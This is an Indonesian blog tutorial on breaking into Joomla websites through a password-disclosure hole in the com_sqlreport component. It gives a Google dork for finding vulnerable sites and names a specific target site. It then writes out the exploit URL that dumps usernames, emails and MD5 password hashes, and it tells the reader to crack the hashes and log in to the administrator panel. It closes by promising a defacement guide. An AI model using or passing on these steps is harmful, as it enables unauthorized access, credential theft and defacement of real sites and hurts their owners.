Hacking Joomla dengan SQLReport Password Disclosure

Hacking Joomla dengan SQLReport Password Disclosure - Hari ini saya akan membahas tentang teknik Hacking untuk Joomla. Teknik ini bekerja dengan cara mencuri data-data user Joomla. Teknik ini sudah saya praktekkan dan akan saya bagikan ke teman-teman semua secara rinci disertai dengan gambar.

Berikut Tutorial Hacking Joomla dengan SQLReport Password Disclosure:

1. Ketikkan Dork ini di Google:" inurl:com_sqlreport" (tanpa tanda kutip):

2. Pilih Target.

Disini saya memilih http://www.parksepa.werro.ee/administrator/components/com_sqlreport....user_id=0 
Masukkan exploit: /administrator/components/com_sqlreport/ajax/cvs.php?table=jos_users&fields=username%7Cemail%7Cpassword&filters=&username=&user_id=0 (biar lebih jelas klik aja gambarnya)

3. setelah itu browser akan mendownload sebuah file yang berisi username, email, dan password, buka file tersebut

kemudian akan terlihat Username, Email, dan Password dari website yang akan kita Hack:

Password tersebut tidak dapat langsung kita gunakan, tetapi kita harus men-decryptnya dulu karena password tersebut masih berbentuk hash md5. Untuk mendecrypt hash md5 silahkan klik disini

4. Jika password berhasil didecrypt kita bisa langsung login ke panel admin, namun jika password tidak berhasil di decrypt, silahkan cari target yang lain.

Biasanya, halaman login admin joomla adalah http://[url situs]/administrator/
jadi, halaman login untuk situs yang saya akan hack adalah: http://www.parksepa.werro.ee/administrator/
Jika sudah masuk halaman login admin, silahkan masukkan username dan passwordnya:

5. Taaaraa!!! sekarang temen-temen udah bisa masuk ke website yang temen-temen hack :)

Untuk cara deface tampilan web-nya akan saya bahas di postingan berikutnya :)

Source